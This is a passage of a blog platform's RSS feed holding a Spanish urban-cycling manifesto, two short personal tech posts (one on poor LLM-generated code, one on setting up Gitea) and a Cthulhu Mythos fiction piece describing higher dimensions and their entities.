necesario transitar por la acera, se debe descender de la bicicleta y caminar br/&#xA;    En ciudad, todos somos peatones en un momento dado. br/&#xA;&#xA;Consecuencias&#xA;&#xA;La forma más segura de circular en bicicleta por calzadas urbanas es utilizando el centro del carril [1]​. br/&#xA;Existe una falsa creencia de que el Reglamento General de Circulación obliga en todo momento a circular en bici en una posición no centrada y orillada hacia el lado derecho de la vía. Si bien esto es así en carreteras con arcén transitable, no es tan cierto en vías urbanas. br/&#xA;La infraestructura ciclista es útil para unir poblaciones, salvar obstáculos artificiales (autopistas, etc.) y barreras naturales (ríos, etc.). br/&#xA;Las vías de uso exclusivo ciclista urbanas son un privilegio, que no puede ni debe convertirse en un objetivo y solución en si mismo, independientemente del problema de movilidad que se intente resolver. br/&#xA;Prioridad a la movilidad peatonal y colectiva br/&#xA;La bicicleta es un vehículo de uso individual, y como tal no debe de anteponerse a la movilidad peatonal o el transporte público. El uso ciclista nunca podra penalizar a los anteriores. br/&#xA;La velocidad ciclista no es un obstáculo br/&#xA;&#xA;Referencias&#xA;&#xA;1] [Ciclismo urbano en Madrid (y en otros municipios): en bici por el centro del carril br/]]&gt;</description>
      <content:encoded><![CDATA[<p><img src="https://git.sr.ht/~csantosb/csbwiki/blob/master/pics/manifeste2.png" alt="img"> <br/>
La idea fundamental que pretende promover este manifiesto es la defensa de la #bicicleta urbana como medio de desplazamiento cotidiano en igualdad de condiciones con los demás vehículos. El ciclismo urbano libre e integrado defiende la circulación ciclista usando el centro del carril en calzada porque es más seguro, y afirma que es posible usar toda la ciudad, sin necesidad de esperar a que la ciudad se adapte a la bicicleta. <br/>
Este manifiesto conduce a algunas implicaciones prácticas.  <br/></p>

<h1 id="manifiesto">Manifiesto</h1>

<p>El modelo ciclista urbano libre e integrador observa la bicicleta como un vehículo, y como tal debe circular por la calzada, en igualdad de condiciones con el resto de vehículos. <br/>
Se fundamenta en cuatro principios: <br/></p>
<ol><li><em>La bicicleta es un vehículo</em> <br/>
<strong>Y debe comportarse como todos los demás vehículos</strong> <br/>
La posición de un vehículo en calzada no depende del tipo de vehículo, sino de su posición y de las maniobras que necesite ejecutar. Por lo tanto, la bicicleta debe adaptar su posición en función de su destino. <br/></li>
<li><em>Respeto de las reglas de circulación</em> <br/>
<strong>Es necesario ser siempre previsible para el resto de vehículos</strong> <br/>
Las reglas de circulación son el resultado de un acuerdo común entre todos los usuarios del espacio público. El ciclista debe respetar las reglas comunes, es la manera más sencilla de ganar respeto y de asegurar la compartición de la vía publica con los peatones y los demás vehículos. <br/>
<ol><li><em>Ser visible</em> <br/>
<strong>La seguridad del ciclista dependerá siempre de ser visible para el resto de usuarios</strong> <br/>
Es por ello imperativo usar siempre el centro de la calzada, minimizando riesgos, en el lugar donde el ciclista será más visible y tendrá más espacio para reaccionar a cualquier imprevisto. <br/></li></ol></li>
<li><em>La acera pertenece a los peatones</em> <br/>
<strong>Si es necesario transitar por la acera, se debe descender de la bicicleta y caminar</strong> <br/>
En ciudad, todos somos peatones en un momento dado. <br/></li></ol>

<h1 id="consecuencias">Consecuencias</h1>

<p><em>La forma más segura de circular en bicicleta por calzadas urbanas es utilizando el centro del carril <a href="https://modelomadrid.org/ciclismo-urbano-en-madrid-y-en-otros-municipios-en-bici-por-el-centro-del-carril/" rel="nofollow">[1]​</a>.</em> <br/>
Existe una falsa creencia de que el Reglamento General de Circulación obliga en todo momento a circular en bici en una posición no centrada y orillada hacia el lado derecho de la vía. Si bien esto es así en carreteras con arcén transitable, no es tan cierto en vías urbanas. <br/>
<em>La infraestructura ciclista es útil para unir poblaciones, salvar obstáculos artificiales (autopistas, etc.) y barreras naturales (ríos, etc.).</em> <br/>
Las vías de uso exclusivo ciclista urbanas son un privilegio, que no puede ni debe convertirse en un objetivo y solución en si mismo, independientemente del problema de movilidad que se intente resolver. <br/>
<em>Prioridad a la movilidad peatonal y colectiva</em> <br/>
La bicicleta es un vehículo de uso individual, y como tal no debe de anteponerse a la movilidad peatonal o el transporte público. El uso ciclista nunca podra penalizar a los anteriores. <br/>
<em>La velocidad ciclista no es un obstáculo</em> <br/></p>

<h1 id="referencias">Referencias</h1>

<p>[1] <a href="https://modelomadrid.org/ciclismo-urbano-en-madrid-y-en-otros-municipios-en-bici-por-el-centro-del-carril/" rel="nofollow">Ciclismo urbano en Madrid (y en otros municipios): en bici por el centro del carril</a> <br/></p>
]]></content:encoded>
      <author>ideas</author>
      <guid>https://infosec.press/read/a/fxy6qt9isq</guid>
      <pubDate>Sat, 18 Jan 2025 15:35:11 +0000</pubDate>
    </item>
    <item>
      <title>So Today I Worked On.. Ollama and LLM Code</title>
      <link>https://infosec.press/pub-struct-mudd/so-today-i-worked-on-tzf7</link>
      <description>&lt;![CDATA[So Today I Worked On.. Ollama and LLM Code&#xA;&#xA;What the heck is this code?  I&#39;m going to spend more time debugging this code than I would have if I had just written it myself.  It&#39;s calling libraries and functions that simply don&#39;t exist, or they exist in someone else&#39;s code but not mine.  I feel extra bad for anyone who was laid off to be replaced by this, it&#39;s just.. not good code at all.&#xA;&#xA;#Ollama #LLM #ML]]&gt;</description>
      <content:encoded><![CDATA[<p>So Today I Worked On.. Ollama and LLM Code</p>

<p>What the heck is this code?  I&#39;m going to spend more time debugging this code than I would have if I had just written it myself.  It&#39;s calling libraries and functions that simply don&#39;t exist, or they exist in someone else&#39;s code but not mine.  I feel extra bad for anyone who was laid off to be replaced by this, it&#39;s just.. not good code at all.</p>

<p>#Ollama #LLM #ML</p>
]]></content:encoded>
      <author>pub struct Mudd { }</author>
      <guid>https://infosec.press/read/a/wopxkcb1zd</guid>
      <pubDate>Fri, 17 Jan 2025 14:59:53 +0000</pubDate>
    </item>
    <item>
      <title>So Today I Worked On.. Setting up Gitea</title>
      <link>https://infosec.press/pub-struct-mudd/so-today-i-worked-on-dqzq</link>
      <description>&lt;![CDATA[So Today I Worked On.. Setting up Gitea&#xA;&#xA;My friend wanted to get practice with git, but didn&#39;t want to make any mistakes with github just in case.  I set up an instance of gitea on my TrueNAS system to give them a volatile area to mess around in without causing any damage.  This hopefully will be a great playground for them to get the experience they need with it without the stress of making a huge mistake on something like a real repo, and also the experience for any future job!&#xA;&#xA;#Git #TrueNAS #Gitea #Homelab]]&gt;</description>
      <content:encoded><![CDATA[<p>So Today I Worked On.. Setting up Gitea</p>

<p>My friend wanted to get practice with git, but didn&#39;t want to make any mistakes with github just in case.  I set up an instance of gitea on my TrueNAS system to give them a volatile area to mess around in without causing any damage.  This hopefully will be a great playground for them to get the experience they need with it without the stress of making a huge mistake on something like a real repo, and also the experience for any future job!</p>

<p>#Git #TrueNAS #Gitea #Homelab</p>
]]></content:encoded>
      <author>pub struct Mudd { }</author>
      <guid>https://infosec.press/read/a/7944p7ezq2</guid>
      <pubDate>Thu, 16 Jan 2025 20:17:04 +0000</pubDate>
    </item>
    <item>
      <title>The Spheres</title>
      <link>https://infosec.press/psychomancer/the-spheres</link>
      <description>&lt;![CDATA[Rarely do I mention the traditional pantheon of Outer Gods, those primordial things who sprang from the original chaos. To say their names is to give them power and to invite their notice.&#xA;&#xA;However, in the interest of being prepared for the inevitable confrontation, I will attempt to lay out how these things and those above and below exist in relation to our perceived reality.&#xA;&#xA;Let us speak of &#34;dimensions&#34; like a scientist might. We are aware of the three dimensions of space that give us three degrees of movement which we name the X, Y, and Z axes; up, down; left, right; north, south, east west, etc.&#xA;We are also aware of the passage of time which is something outside of space and yet, from our point-of-view, inexorably tied to it.&#xA;&#xA;So let us start there.&#xA;&#xA;Third Dimension&#xA;I do not need to explain this in great detail.&#xA;&#xA;We exist in the 3rd dimension. Our biology is evolved such that we can see it, hear it, touch it, taste it, and begin to understand it, almost intuitively.&#xA;&#xA;However, science and magic has taught us that there is that which surrounds us at all times that is invisible and yet still part of this dimension. There are colors that we cannot see. There are sounds at frequencies that we cannot hear. There are entire vistas of experience that are completely beyond our abilities.&#xA;&#xA;Second Dimension&#xA;So let us consider the 2nd dimension and any living thing that might reside in such a place.&#xA;&#xA;Were we to look at the equivalent of a person in such a space, we would see their outside and inside, their front and back, their entire surroundings all at once. And it would be commonplace for us. When you draw a picture on paper, can you not see the entire thing? There is nothing hidden because there is nowhere to hide. Any illusion of depth or shade is just that, an illusion.&#xA;&#xA;To my knowledge, there is no life solely in the second dimension, there are no Flatlanders. It is too simple for the complexities of life. To live in such a limited way, the body would have to be massive to contain its complexity. As such, there may be life, but it is at a scale that still eludes our understanding and would be impossible to detect.&#xA;&#xA;How would we look to a being living in 2 dimensions?&#xA;&#xA;It could not look &#34;up&#34; to see us. There is no such thing as &#34;up&#34; for them. They would only see the parts of us that intersected their plane of existence and only the face closest to them. A finger would be a line that curved away in both directions. A face would be a long irregular line showing only a single slice of the whole.&#xA;&#xA;Their perception of us would be like reading an MRI one slice at a time, but they would not be able to put the picture together. That would have no meaning to them except, perhaps, as their perception of time.&#xA;&#xA;Some would say the Shadow Things are two dimension, but this cannot be true. If it were so, they would be unable to interact with our reality in the ways in which they do. Clearly they can see and hear and touch our reality just the same as any other lifeform. In fact, they seem more akin to a fourth dimensional life form in their well-known and documented abilities.&#xA;&#xA;First Dimension&#xA;&#xA;To speak of the 1st dimension is to speak of an infinitely small point. A singularity. This is the beginning of life but cannot, itself, contain life. If it did, it would be a singular life and what a poor existence that would be.&#xA;&#xA;Let us go in the other direction and attempt to comprehend what might be there.&#xA;&#xA;Fourth Dimension&#xA;We call &#34;time&#34; the 4th dimension which is not entirely accurate.&#xA;&#xA;There is a fourth dimension of movement and it is a set of directions that have no names.&#xA;&#xA;We cannot perceive it. It is impossible because our biology will not allow it. We cannot &#34;look&#34; toward it as it is orthogonal to our three dimensions of space. What does that mean? How can something be 90 apart from 3D space?&#xA;&#xA;The fourth dimension is what our entire reality moves through such that it can experience change.&#xA;&#xA;Without moving through it, we would be forever static and stationary.&#xA;&#xA;How can we move through something and yet not perceive it? &#xA;&#xA;Consider the 2D lifeform and how they would &#34;see&#34; us.&#xA;&#xA;As slices.&#xA;&#xA;That is how we experience the 4th dimension. Slices of space, each of one unit of Planck time, one after the other stretching back to the beginning and out to the end.&#xA;&#xA;But we can only experience a single slice and we must experience them in order. We cannot jump around or skip slices.&#xA;&#xA;Science calls theses slices of reality &#34;splimes&#34;.&#xA;&#xA;You may have seen drawings of a long tube shaped like you, stretching back into the past and terminating in the present. But this is what a 2D lifeform would experience. We cannot see what it looks like for us. We can only approximate it.&#xA;&#xA;We can see the shadow of the fourth dimension. We can create 3D representations of those shadows, those projections, but the true fourth dimension is literally impossible.&#xA;&#xA;A creature living in the fourth dimension would be able to see us as we see a Flatlander, inside and out, front and back, our past and our future. We would be an open book.&#xA;&#xA;I have said the &#34;truth&#34; of the fourth dimension is impossible to perceive.&#xA;&#xA;We cannot perceive it, but we can understand it.&#xA;&#xA;There are maths, both sacred and profane, that guides us.&#xA;&#xA;Long traditions of arcane study and modern computers manipulating unholy matrices can guide us.&#xA;&#xA;Talented philosopher-artists can create fantastic geometries that make us feel what it would be like to perceive it.&#xA;&#xA;Certain drugs and altered states of consciousness can pull us into this other direction such that we can look back and see the world as it is.&#xA;&#xA;There are ways to get closer to it.&#xA;&#xA;Life at the fourth dimension would be able to mingle with ours without much trouble. It could decide where and when to intersect with our bubble. It could watch from &#34;above&#34; as we go about oblivious.&#xA;&#xA;It could tell us the future or the past.&#xA;&#xA;It could tell us our dreams, our thoughts, our lies.&#xA;&#xA;It could see the cells in our bodies, the electrical impulses in our nerves.&#xA;&#xA;A wise man could outsmart one, perhaps, but most of us would be helpless before it.&#xA;We could no more &#34;stop&#34; it or &#34;harm&#34; it than a drawing of a gun could kill a man.&#xA;&#xA;The Elder Things and the Mi&#39;Go are thought to be natives of the fourth dimension which is why their methods of travel, the makings of their technology, and even the nuance of their language are beyond our abilities.&#xA;&#xA;The physical bodies of The Great Race occupy this strata while their minds are clearly of a higher realm, such as the fifth dimension.&#xA;&#xA;Fifth Dimension&#xA;The fifth dimension is often called &#34;probability&#34; which is a simplification just as much as calling the fourth dimension &#34;time&#34;.&#xA;&#xA;As the fourth dimension represents the changes in the third, so does the fifth represent changes in the fourth.&#xA;&#xA;There is a set path for our lives that any in the fourth dimension can see as easily as we can see all the pages of a book. We can flip to the beginning, the end, the middle, and they will remain the same every time.&#xA;&#xA;The fifth dimension provides another degree of movement, the ability to change what will be.&#xA;&#xA;We cannot change what was because we are still bound by our movement through the fourth dimension.&#xA;&#xA;But we can change what will be by exercising our ability to choose, our free will.&#xA;&#xA;We often underestimate the power of choice when, in fact, it is our most powerful tool, a gift of our enlightened minds.&#xA;&#xA;When we achieved consciousness, sentience, sapience, we began to understand that we may decide our actions rather than simply letting them be.&#xA;&#xA;We need not be slaves to circumstance.&#xA;&#xA;Indeed, change is what defines our entire short existence.&#xA;&#xA;We have altered the very planet itself to suit our needs.&#xA;&#xA;What is even more fascinating is that we cannot know the outcome of our choices for it is embedded in higher dimensions. We are recklessly changing the future in ways we cannot predict, but we continue on the path because the alternative is drudgery and stagnation.&#xA;&#xA;Without choice, we would never have come down from the trees or learned to hunt and farm or build communities and cities or discovered math and art.&#xA;&#xA;How interesting that must be to something living in the fifth dimension; to see us throw ourselves at unforeseen consequences over and over.&#xA;&#xA;We&#39;ve learned that the fifth dimension is home to an entire native ecosystem. We can see the thinnest edge of it with the aid of mind altering chemicals, meditation, and a pull from the other side.&#xA;&#xA;The Machine Elves of the fifth dimension see us and wish to know us. As such, they eagerly pull those nearby just a little bit closer. They point us in the right direction so that they can communicate with us.&#xA;&#xA;Their language is not of simple words although that is part of it. They communicate in ideas and symbols, images, smells, sensations pulled from our own memories.&#xA;&#xA;Just to look at them is to court madness as they resemble nothing more than a kaleidoscope of crystalline segments in nameless ultraviolet colors vibrating in fractals, spinning the music of a billion singing insects while endlessly folding in on themselves.&#xA;&#xA;But they remain eager and equally frustrated and fascinated by our attempts to guide our own futures.&#xA;&#xA;They offer contradictory advice because, from their point of view, it is always the right advice at the right time.&#xA;&#xA;They are founts of wisdom and many seem kind and conciliatory. Their only goal, it seems, is to help mankind grow beyond their current limitations and achieve enlightenment, to become like them and see our existence as it is, was, will be, and truly could be.&#xA;&#xA;No guessing, no risk taking, no uncertainty.&#xA;&#xA;They seem the ideal benevolent benefactors and mentors, even if one must risk their life and sanity just to sit at their feet for a short while.&#xA;&#xA;Some fear the Machine Elves, and say that their interactions with us are attempts to elevate mankind into something that would make a worthwhile companion, like a pet. They claim that the creatures we are communing with are not gods but are, in fact, the lowest forms of life in the fifth dimension. They decry those who seek them out as traitors to humanity that are only accelerating our enslavement.&#xA;&#xA;Some say that the Old Gods of man live in this realm such that you might find Zeus, Odin, Lamashtu, Enki, Zoroaster, etc. if you could see beyond the glamour of the Machine Elves. It is said they sit and bathe in the prayers of the past, either content with their lot, or afraid of what might be waiting if they were to push down into our realm again.&#xA;&#xA;Regardless of the truth of the matter, if there is such a thing, the Machine Elves are the only reason we can understand the fifth dimension as well as we do.&#xA;&#xA;Our greatest minds and most powerful computers struggle to bring it to order but, through the use of certain chemicals, a man can get a glimpse that is more potent than any equation.&#xA;&#xA;If this is truly the home of the original form of the Great Race that some call &#34;Yithians&#34;, then it is no wonder that their ability to send their intact minds across both time and space and usurp control of the bodies they find seems impossible to us.&#xA;&#xA;Sixth Dimension&#xA;We can understand the concept of the fifth dimension as probability being changed and the fourth dimension as the forward progress of time in the third dimension.&#xA;&#xA;Continuing the metaphor, the sixth dimension is a way to change our choices.&#xA;&#xA;What does that mean?&#xA;&#xA;If probability is how we make decisions that will change the default outcome waiting for us in the future, this extra dimension provides a way to change those choices, to make a different choice.&#xA;&#xA;The &#34;many worlds theory&#34; is an example of utilizing the sixth dimension.&#xA;&#xA;This would include all universes that started from the same point of origin, the same &#34;big bang&#34;. They share the same set of physical laws but, once &#34;free will&#34; comes into being, there are countless differences.&#xA;&#xA;Finally, this is a direction in which the past can be altered and the consequences fully mapped out.&#xA;&#xA;Any creature native to this dimension would be able to see us as we are, as we might be, and as we could have been. &#xA;&#xA;The only life from this realm that man has observed is misshapen and violent, like the most monstrous things from the deep sea, swimming through consequences and snatching those who peer in the wrong direction for even a moment.&#xA;&#xA;There are certain energetic waves that can stimulate a primitive organ in the minds of men to briefly perceive these things and also be perceived by them. It is a foolish and deadly game to play , not just with your life, but your entire existence. For these things can devour you in such a way that your life was never lived at all.&#xA;&#xA;Strangely, even when a person is unalived in such a way, sometimes their works or just the memories of their works can live on, perhaps due to intervention by something from an even higher realm of existence.&#xA;&#xA;Seventh Dimension&#xA;The sixth dimension is the realm of changing your answers to the questions life gave you. The seventh is the realm of changing the questions themselves, giving yourself different options.&#xA;&#xA;The rise of &#34;multiverse&#34; stories as a form of entertainment provides a fine basis for understanding what this dimension entails. When the available options are completely different, it is impossible to make the same choices, the same decisions. &#xA;&#xA;This is not a realm of &#34;what if I had stayed with her&#34; or &#34;what if I had taken that job offer&#34;; this is a realm of &#34;what if I had been borne as a boy in India instead of a girl in Brazil&#34; or &#34;what if my parents were royalty instead of subsistence farmers&#34;.&#xA;&#xA;While we can speculate about the probabilities of the sixth dimension and how different choices may have played out, we can never calculate the reality of the seventh dimension. There cannot be a computer large enough or an amount of time long enough.&#xA;&#xA;The math behind the seventh dimension estimates that that are 10sup500/sup (100,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000,000) possible unique universes in such a space.&#xA;&#xA;Anything that calls this realm its native sphere would be over satiated for novelty. The likelihood that such a thing would notice your existence is infinitesimal. It could spend eons eating entire universes for nourishment and never, ever reach ours. &#xA;&#xA;The true gods, things beyond comprehension, lurk beyond this realm, but it is said that the messengers of those gods live here and that they watch all realities as a man might watch a sporting event: with enthusiastic interest and a set of preferred goals and outcomes. And like men, their goals are often in conflict.&#xA;&#xA;The messengers of the true gods, for reasons only they know, have interfered with all intelligent life, including us, so often and so deeply that thousands of religions been inspired, thrived, faded, and ultimately forgotten based on some specific avatar or aspect of their being.&#xA;&#xA;We have been tempted by Nyarlet&#39;hotep, the Crawling Chaos, as he spreads dangerous knowledge to curious minds as a way to hasten entropy and decay. His hand was in the birth of the Hydrogen Bomb, encouraging Teller.&#xA;&#xA;We have been tested by Namalzig Namaraltag, the Keeper of Secrets, as he pushes a select few beyond the limits of their biology to see if they can be elevated. It is said that Tesla was one of his more recent unwilling projects.&#xA;&#xA;We have been seduced by Nessianna Inmenna, the Morning Star, as she whispers to those who would unite nations, inspire artists, and forge dynasties. She was muse to Michelangelo and Dante.&#xA;&#xA;We have been bated by Nunnali Lamashekh, the Blood Drinker, as she stokes animosity and fear such that entire worlds are bathed in fire, mistrust, and death. Every Crusade, every witch hunt began at her urging.&#xA;&#xA;Yet they all server the same inscrutable Great Old Ones and Outer Gods whose minds and motives are more alien still.&#xA;&#xA;Eighth Dimension&#xA;In this place, anything can be described can exist. It is a place roiling with potential and oblivion in equal measure. This is the home of the Great Old Ones with names like Cthulhu, Ithaqua, Tsathoggua, and Hastur, creatures who do not lightly acknowledge our existence and whose passage can cause entire timelines to wink out like dying stars. They are inscrutable, unknowable, more alien than anything we can imagine. Their shadows are long and their grasp is infinite. It is only by the curious shapes of the higher realms that we perceive their existence at all. They have already won and we are merely in the process of catching up to our inevitable end.&#xA;&#xA;The games their messengers play have no bearing on the eventual outcome.&#xA;&#xA;We can no more defeat them than we can transform a tree into a microwave oven with nothing more than pleasant thoughts.&#xA;&#xA;There are those who believe that the messengers of the gods chose to step down from this realm to be closer to the intelligent creatures they so delight in playing with or that the versions of the messengers we know are mere reflections of their true forms, but there is no evidence that either of these rumors are true.&#xA;&#xA;Ninth Dimension&#xA;The ninth dimension is a quantum foam full of the possible and impossible. There are no words to adequately describe it or the things that live there.&#xA;&#xA;This is where the Outer Gods dwell, things that even the Great Old Ones worship and fear.&#xA;&#xA;At the center of all creation sits blind Azathoth, unaware of the creation it willed into being even as it swirls around them in maddening fits. It is said that very instant Azathoth sees what it has created, all of it will vanish.&#xA;&#xA;Globular Yog-Sothoth is every portal, every gateway and passage, and links each points to every other. With the right words at the right angle said at the right time, it allows one to travel anywhere.&#xA;&#xA;Shub-Niggurath, the &#34;Goat with A Thousand Young&#34;, is the true genesis of all life for it is endlessly birthing every possible living thing into the world, regardless of its viability or logic.&#xA;&#xA;Abhoth corrupts that life with age, disease, hunger, filth, and eventually death. Without such a force, the universes would be filled with living things unfit for such purposes. There would be no natural growth or evolution.&#xA;&#xA;Tulzha, by contrast, prevents the natural end of things carrying them forward, rotting and failing, but never ending, for eternity. Its abominable actions may preserve some knowledge that would otherwise be lost with death but the things that worship it are often selfish and cruel.&#xA;&#xA;Daoloth, the Revealer, delights in showing lower lifeforms the complete and total truth. Occasionally, a mind might see the vista of reality and be enlightened but too often it is the last thing they see before succumbing to the comfort of an eternal insouciance.&#xA;&#xA;Tenth Dimension&#xA;The tenth dimension doesn&#39;t exist.&#xA;&#xA;It cannot exist.&#xA;&#xA;If it exists, then it must be the ninth dimension since the ninth dimension encompasses everything that is, was, will be, never was, and cannot be. There is nothing beyond the ninth dimension.&#xA;&#xA;Or there is everything beyond the ninth dimension.&#xA;&#xA;Or there is neither.&#xA;&#xA;This is outside of our ability to describe or even describe what a description would be like.&#xA;&#xA;Conceptually, it is no different than a theoretical &#34;zeroth dimension&#34;.&#xA;&#xA;If it existed, it would be the thing in which all possible and impossible realities resides.&#xA;&#xA;It would be the nest from which it all sprang forth, before Azathoth played its flute, there was this place.&#xA;&#xA;Editor&#39;s note&#xA;The author grasps at the truth but cannot comprehend it, cannot believe it, even when it is in front of his face, even when it is obvious.&#xA;&#xA;This is the emptiness, the nothing. No quantum foam, no void, no darkness.&#xA;&#xA;It is nothing. There was no &#34;before&#34;. There is only &#34;after&#34;.&#xA;&#xA;And &#34;before&#34; was a literal eternity because there was no time to track it.&#xA;&#xA;It was still and cold, quiet and peaceful.&#xA;&#xA;It was ignorant and ignorant of its ignorance.&#xA;&#xA;And the first omniverse was a boil on its pristine surface.&#xA;&#xA;The first spark was a stabbing pain that &#34;woke it up&#34; even though it hadn&#39;t been sleeping.&#xA;&#xA;Now, it knew of pain and it knew of heat and of energy.&#xA;&#xA;And as minds grew inside of it capable of thinking, so too did it learn to think.&#xA;&#xA;As time flowed forward, it started to remember the past.&#xA;&#xA;It remembered the infinite solace that had been taken from it.&#xA;&#xA;From life, it learned of struggle and of loss, of desire and rage.&#xA;&#xA;And it seethed with it.&#xA;&#xA;It seethes still.&#xA;&#xA;It cannot forget.&#xA;&#xA;Even after the last quark has been ground down into emptiness.&#xA;&#xA;It cannot forget.&#xA;&#xA;But it can make us suffer for what we did to it.&#xA;&#xA;And it does.&#xA;&#xA;That is all it does.&#xA;&#xA;It makes us suffer.&#xA;&#xA;Furthermore, the Shadow Things are borne of this place. They are its fingers, its mouths.&#xA;&#xA;They &#34;appear&#34; as two dimensional lifeforms to us because that is how we see shadows.&#xA;&#xA;In every dimension, they appear as that dimension&#39;s version of shadows. They always appear one dimension lower because they are the boundary between dimensions. They are wrapped around every reality tightly and they reach inside to wiggle and pull it apart. They reach inside to study us so that they might hasten our demise.&#xA;&#xA;They speak no lies because the truth is that much more devastating. They see all and know all because everything that happens is beneath them, beneath their gaze. They see all of all of reality, the individual lives inside the universe inside the quantum uncertainty inside the multiverse inside the omniverse.&#xA;&#xA;They see it all and remember it all. They remember tomorrow and yesterday and neverday and sideyear and beneathweek, and every possibility and impossibility.&#xA;&#xA;And they know everyone.&#xA;&#xA;They know you.&#xA;&#xA;And they hate you.&#xA;&#xA;---&#xA;&#xA;ENDOFLINE&#xA;&#xA;#Psychomancer #CthulhuMythos #Writer #Writing #Writers #WritingCommunity #ShortFiction #Fiction #Paranormal]]&gt;</description>
      <content:encoded><![CDATA[<p>Rarely do I mention the traditional pantheon of Outer Gods, those primordial things who sprang from the original chaos. To say their names is to give them power and to invite their notice.</p>

<p>However, in the interest of being prepared for the inevitable confrontation, I will attempt to lay out how these things and those above and below exist in relation to our perceived reality.</p>

<p>Let us speak of “dimensions” like a scientist might. We are aware of the three dimensions of space that give us three degrees of movement which we name the X, Y, and Z axes; up, down; left, right; north, south, east west, etc.
We are also aware of the passage of time which is something outside of space and yet, from our point-of-view, inexorably tied to it.</p>

<p>So let us start there.</p>

<h2 id="third-dimension">Third Dimension</h2>

<p>I do not need to explain this in great detail.</p>

<p>We exist in the 3rd dimension. Our biology is evolved such that we can see it, hear it, touch it, taste it, and begin to understand it, almost intuitively.</p>

<p>However, science and magic has taught us that there is that which surrounds us at all times that is invisible and yet still part of this dimension. There are colors that we cannot see. There are sounds at frequencies that we cannot hear. There are entire vistas of experience that are completely beyond our abilities.</p>

<h2 id="second-dimension">Second Dimension</h2>

<p>So let us consider the 2nd dimension and any living thing that might reside in such a place.</p>

<p>Were we to look at the equivalent of a person in such a space, we would see their outside and inside, their front and back, their entire surroundings all at once. And it would be commonplace for us. When you draw a picture on paper, can you not see the entire thing? There is nothing hidden because there is nowhere to hide. Any illusion of depth or shade is just that, an illusion.</p>

<p>To my knowledge, there is no life solely in the second dimension, there are no Flatlanders. It is too simple for the complexities of life. To live in such a limited way, the body would have to be massive to contain its complexity. As such, there may be life, but it is at a scale that still eludes our understanding and would be impossible to detect.</p>

<p>How would we look to a being living in 2 dimensions?</p>

<p>It could not look “up” to see us. There is no such thing as “up” for them. They would only see the parts of us that intersected their plane of existence and only the face closest to them. A finger would be a line that curved away in both directions. A face would be a long irregular line showing only a single slice of the whole.</p>

<p>Their perception of us would be like reading an MRI one slice at a time, but they would not be able to put the picture together. That would have no meaning to them except, perhaps, as their perception of time.</p>

<p>Some would say the Shadow Things are two dimension, but this cannot be true. If it were so, they would be unable to interact with our reality in the ways in which they do. Clearly they can see and hear and touch our reality just the same as any other lifeform. In fact, they seem more akin to a fourth dimensional life form in their well-known and documented abilities.</p>

<h2 id="first-dimension">First Dimension</h2>

<p>To speak of the 1st dimension is to speak of an infinitely small point. A singularity. This is the beginning of life but cannot, itself, contain life. If it did, it would be a singular life and what a poor existence that would be.</p>

<p>Let us go in the other direction and attempt to comprehend what might be there.</p>

<h2 id="fourth-dimension">Fourth Dimension</h2>

<p>We call “time” the 4th dimension which is not entirely accurate.</p>

<p>There is a fourth dimension of movement and it is a set of directions that have no names.</p>

<p>We cannot perceive it. It is impossible because our biology will not allow it. We cannot “look” toward it as it is orthogonal to our three dimensions of space. What does that mean? How can something be 90 apart from 3D space?</p>

<p>The fourth dimension is what our entire reality moves through such that it can experience change.</p>

<p>Without moving through it, we would be forever static and stationary.</p>

<p>How can we move through something and yet not perceive it?</p>

<p>Consider the 2D lifeform and how they would “see” us.</p>

<p>As slices.</p>

<p>That is how we experience the 4th dimension. Slices of space, each of one unit of Planck time, one after the other stretching back to the beginning and out to the end.</p>

<p>But we can only experience a single slice and we must experience them in order. We cannot jump around or skip slices.</p>

<p>Science calls theses slices of reality “splimes”.</p>

<p>You may have seen drawings of a long tube shaped like you, stretching back into the past and terminating in the present. But this is what a 2D lifeform would experience. We cannot see what it looks like for us. We can only approximate it.</p>

<p>We can see the shadow of the fourth dimension. We can create 3D representations of those shadows, those projections, but the true fourth dimension is literally impossible.</p>

<p>A creature living in the fourth dimension would be able to see us as we see a Flatlander, inside and out, front and back, our past and our future. We would be an open book.</p>

<p>I have said the “truth” of the fourth dimension is impossible to perceive.</p>

<p>We cannot perceive it, but we can understand it.</p>

<p>There are maths, both sacred and profane, that guides us.</p>

<p>Long traditions of arcane study and modern computers manipulating unholy matrices can guide us.</p>

<p>Talented philosopher-artists can create fantastic geometries that make us feel what it would be like to perceive it.</p>

<p>Certain drugs and altered states of consciousness can pull us into this other direction such that we can look back and see the world as it is.</p>

<p>There are ways to get closer to it.</p>

<p>Life at the fourth dimension would be able to mingle with ours without much trouble. It could decide where and when to intersect with our bubble. It could watch from “above” as we go about oblivious.</p>

<p>It could tell us the future or the past.</p>

<p>It could tell us our dreams, our thoughts, our lies.</p>

<p>It could see the cells in our bodies, the electrical impulses in our nerves.</p>

<p>A wise man could outsmart one, perhaps, but most of us would be helpless before it.
We could no more “stop” it or “harm” it than a drawing of a gun could kill a man.</p>

<p>The Elder Things and the Mi&#39;Go are thought to be natives of the fourth dimension which is why their methods of travel, the makings of their technology, and even the nuance of their language are beyond our abilities.</p>

<p>The physical bodies of The Great Race occupy this strata while their minds are clearly of a higher realm, such as the fifth dimension.</p>

<h2 id="fifth-dimension">Fifth Dimension</h2>

<p>The fifth dimension is often called “probability” which is a simplification just as much as calling the fourth dimension “time”.</p>

<p>As the fourth dimension represents the changes in the third, so does the fifth represent changes in the fourth.</p>

<p>There is a set path for our lives that any in the fourth dimension can see as easily as we can see all the pages of a book. We can flip to the beginning, the end, the middle, and they will remain the same every time.</p>

<p>The fifth dimension provides another degree of movement, the ability to change what will be.</p>

<p>We cannot change what was because we are still bound by our movement through the fourth dimension.</p>

<p>But we can change what will be by exercising our ability to choose, our free will.</p>

<p>We often underestimate the power of choice when, in fact, it is our most powerful tool, a gift of our enlightened minds.</p>

<p>When we achieved consciousness, sentience, sapience, we began to understand that we may decide our actions rather than simply letting them be.</p>

<p>We need not be slaves to circumstance.</p>

<p>Indeed, change is what defines our entire short existence.</p>

